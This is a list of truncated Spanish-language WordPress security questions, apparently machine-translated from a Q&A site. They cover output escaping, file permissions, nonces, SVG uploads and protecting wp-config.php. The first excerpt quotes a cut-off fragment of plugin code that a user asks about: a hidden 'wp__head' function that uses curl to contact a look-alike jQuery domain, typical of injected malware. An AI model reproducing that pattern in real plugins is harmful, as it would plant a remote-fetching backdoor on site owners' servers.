Encontré esto en un complemento. ¿Qué hace? ¿Es peligroso? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1");...
¿El mantenimiento wp-admin/install.phpy wp-admin/install-helper.phpuna fuga de seguridad en las versiones más nuevas de WordPress? Por defecto, el permiso de archivo en esos archivos es 644. Si hay alguna fuga, ¿qué tipo de por
Tal como está actualmente, esta pregunta no es adecuada para nuestro formato de preguntas y respuestas. Esperamos que las respuestas estén respaldadas por hechos, referencias o experiencia, pero esta pregunta probablemente solicitará debate, argumentos, encuestas o discusión
Había mirado el código pero no pude ver ningún escape en funciones como the_title the_content the_excerptetc. Puede que no lo esté leyendo bien. ¿Necesito escapar de estas funciones en el desarrollo de temas como: esc_html ( the_title () ) Editar: como se señaló en las respuestas a continuación,...
Veo que los SVG están bloqueados de manera predeterminada en el cargador de medios y debe agregarlo como un tipo MIME compatible en functions.php. ¿Qué razones de seguridad hay detrás de
Tenemos algunos problemas con un desarrollador externo. Queremos limitar el acceso al wp-adminsitio solo al acceso interno (a través de VPN ). Simplemente para que no sea atacado por usuarios externos. Podemos enumerar los administradores del sitio y no queremos que sean phishing. Nuestro...
Configurar WordPress para actualizar dentro de la aplicación (es decir, WordPress) es ideal para mí debido a su conveniencia. Sin embargo, estoy preocupado por los requisitos. Los campos solicitados que aparecen después de instalar ssh2 para php preguntan no solo mi clave pública, sino también mi...
Mirando el Codex para wp_insert_post () , establece que esta función "... desinfecta las variables, realiza algunas comprobaciones, completa las variables faltantes como fecha / hora, etc." (EDITAR: Actualicé la entrada del Codex para incluir un ejemplo más robusto que incluye seguridad, así como...
Solo una pregunta rápida que podría ayudar un poco con la seguridad. Noté que el archivo readme.html tiene el número de versión listado. Reaparece después de cada actualización y también lo hacen licence.txt y wp-config-sample.php. ¿Hay una manera fácil de hacer que WordPress elimine...
Esto dificulta mi codificación. Wordpress codex razona el uso de esc_url al hablar vagamente sobre seguridad. ¿Pero realmente vale la pena? Por ejemplo, ¿cuál es el beneficio de seguridad práctico importante al usar <?php echo esc_url( home_url( '/' ) ); ?> en lugar de <?php echo...
Situación inicial Para un sitio que estoy configurando, estaba investigando todo el campo de asegurar cargas / descargas y restringir el acceso a ellos en función de las funciones / capacidades del usuario. Por supuesto, he leído algunas de las preguntas anteriores relacionadas con el tema...
Parece que hacen casi el mismo tipo de trabajo. Entonces... ¿Cuándo debo usar en esc_html()lugar de
Estoy tratando de asegurar mi blog de WordPress. Leí algunas publicaciones en la web que deberían cambiar table_prefixy ocultar mi wp-config.php. Sin embargo, no lo entiendo? ¿Qué podría hacer un atacante con mi wp-config.php? Quiero decir que hay mis configuraciones de base de datos, pero el...
Estoy buscando usar algunas API y muchas vienen con claves, claves secretas y contraseñas necesarias para trabajar. ¿Dónde en WordPress puedes almacenar esa información? Suponiendo que alguien pueda hackear su base de datos, ¿existe WordPress para que guardar esa información sea más seguro? Además,...
Esta es probablemente una pregunta novata PERO escúchame, ¿no es el punto de usar Nonce para protegerte de cosas como los scrappers (phpcurl scrappers, etc.)? Pero mi Nonce se imprime en la cabecera del documento así: /* <![CDATA[ */ var nc_ajax_getpost = { ...stuff... getpostNonce:...
He estado revisando mucha información sobre el tema de WP y la seguridad de los complementos y entiendo el concepto de que debe escapar de los atributos y los valores HTML en los temas y complementos. He visto bloginfo()y echo get_bloginfo()utilizado tanto estándar y dentro de una esc_html()o...
Quiero filtrar cualquier URI de solicitud HTTP realizada a través de la API HTTP. Casos de uso: La verificación de actualización de WordPress va a http://api.wordpress.org/core/version-check/1.6/ , pero https://api.wordpress.org/core/version-check/1.6/ también funciona, y quiero para usar esto...
He leído muchos artículos del blog de seguridad de WordPress donde los expertos en seguridad recomiendan algunos pasos especiales para tener cuidado cuando alguien está preocupado por la seguridad de su sitio de WordPress. Uno de ellos es: Consejos de seguridad de WordPress: elimine...
Acabo de publicar un nuevo complemento: No más contraseñas Actualmente lo tengo etiquetado como beta porque iniciar sesión en una plataforma es un problema delicado y no quiero lanzar algo que pueda tener agujeros de seguridad. Así que aquí está mi consulta: ¿Es seguro? He hecho lo siguiente...
Acabo de ejecutar WP en mi propio servidor. No estoy tratando de bloquear las cosas más. ¿Qué permisos debe tener el usuario de db para mi WP